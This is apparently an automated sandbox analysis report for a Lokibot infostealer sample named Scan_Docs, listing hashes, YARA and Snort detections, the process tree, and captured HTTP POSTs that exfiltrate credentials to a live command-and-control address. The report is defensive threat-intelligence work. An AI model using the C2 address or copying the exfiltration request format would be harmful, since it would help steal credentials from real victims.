Loading ...

Play interactive tourEdit tour

Analysis Report Scan_Docs.r00

Overview

General Information

Sample Name:Scan_Docs.r00 (renamed file extension from r00 to rar)
MD5:0f187b992aa1dafb579eb3931e945283
SHA1:3ccabd079a208b5931a8ab4d5f72d4924b214e8d
SHA256:63ccabee37612823a15b87ff4d514c4a19b4e33e322ac252a0ff05bb39363520

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • unarchiver.exe (PID: 5080 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Desktop\Scan_Docs.rar' MD5: CC652A2104B9470999DA6603F972D7B4)
    • 7za.exe (PID: 2388 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1508 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Scan_Docs.exe (PID: 4764 cmdline: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe MD5: 1D950523E3748FF6DBBBFAD6B611C55A)
        • Scan_Docs.exe (PID: 4192 cmdline: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe MD5: 1D950523E3748FF6DBBBFAD6B611C55A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableSteve Miller, Florian Roth
  • 0x3e3cd:$s1: http://
  • 0x4448d:$s1: http://
  • 0x45238:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x3e3cd:$f1: http://
  • 0x4448d:$f1: http://
C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeLoki_1Loki Payloadkevoreilly
  • 0x3e429:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x3e1f1:$a2: last_compatible_version

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.638435641.0000000006005000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x33a9:$des3: 68 03 66 00 00
        • 0x10e1a:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x10ee6:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.Scan_Docs.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            6.2.Scan_Docs.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              6.2.Scan_Docs.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x13bff:$des3: 68 03 66 00 00
              • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              6.2.Scan_Docs.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              6.2.Scan_Docs.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                Click to see the 15 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeAvira: detection malicious, Label: HEUR/AGEN.1046458
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://198.23.200.239/~boxing/.tcsogb/cf.php/r0dzBU5oBLUSvVirustotal: Detection: 10%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeVirustotal: Detection: 60%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeReversingLabs: Detection: 70%
                Multi AV Scanner detection for submitted fileShow sources
                Source: Scan_Docs.rarVirustotal: Detection: 16%Perma Link
                Source: Scan_Docs.rarReversingLabs: Detection: 47%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJoe Sandbox ML: detected

                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74

                Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 0555055Fh0_2_055500A0

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49707 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49707 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49707 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49707 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49709 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49709 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49709 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49709 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49710 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49710 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49710 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49710 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49712 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49712 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49712 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49712 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49713 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49713 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49713 -> 198.23.200.239:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49713 -> 198.23.200.239:80
                Source: Joe Sandbox ViewASN Name: unknown unknown
                Source: global trafficHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 165Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.200.239
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00404ED4 recv,6_2_00404ED4
                Source: unknownHTTP traffic detected: POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 198.23.200.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AE292164Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 May 2020 11:45:15 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 20 0d 0a 20 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0
                Source: 7za.exe, 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, Scan_Docs.exe, 00000006.00000002.958292453.00000000007C2000.00000002.00020000.sdmp, Scan_Docs.exe.1.drString found in binary or memory: ftp://ftps://http://https://s.txt%s
                Source: Scan_Docs.exe, 00000006.00000002.958269659.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://198.23.200.239/~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv
                Source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.co
                Source: Scan_Docs.exe, Scan_Docs.exe, 00000006.00000002.958292453.00000000007C2000.00000002.00020000.sdmp, Scan_Docs.exe.1.drString found in binary or memory: http://www.ibsensoftware.co1
                Source: Scan_Docs.exe, Scan_Docs.exe, 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPEDMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                .NET source code contains very large array initializationsShow sources
                Source: Scan_Docs.exe.1.dr, fGu0021/aAu002b.csLarge array initialization: 4Hz: array initializer size 25500
                Source: Scan_Docs.exe.1.dr, fGu0021/Bu002be.csLarge array initialization: 3Bg: array initializer size 19780
                Source: Scan_Docs.exe.1.dr, fGu0021/s_8.csLarge array initialization: H?g: array initializer size 14112
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/aAu002b.csLarge array initialization: 4Hz: array initializer size 25500
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/Bu002be.csLarge array initialization: 3Bg: array initializer size 19780
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/s_8.csLarge array initialization: H?g: array initializer size 14112
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/aAu002b.csLarge array initialization: 4Hz: array initializer size 25500
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/Bu002be.csLarge array initialization: 3Bg: array initializer size 19780
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/s_8.csLarge array initialization: H?g: array initializer size 14112
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/aAu002b.csLarge array initialization: 4Hz: array initializer size 25500
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/Bu002be.csLarge array initialization: 3Bg: array initializer size 19780
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/s_8.csLarge array initialization: H?g: array initializer size 14112
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/aAu002b.csLarge array initialization: 4Hz: array initializer size 25500
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/Bu002be.csLarge array initialization: 3Bg: array initializer size 19780
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/s_8.csLarge array initialization: H?g: array initializer size 14112
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02EC9C14 CreateProcessAsUserW,5_2_02EC9C14
                Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_055500A00_2_055500A0
                Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_055500060_2_05550006
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CD28605_2_00CD2860
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CD81DB5_2_00CD81DB
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02ECBA005_2_02ECBA00
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02EC3BD05_2_02EC3BD0
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02EC1B785_2_02EC1B78
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02EC88685_2_02EC8868
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02EC88585_2_02EC8858
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02ECB9F05_2_02ECB9F0
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040549C6_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_004029D46_2_004029D4
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007C28606_2_007C2860
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007C81DB6_2_007C81DB
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
                Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
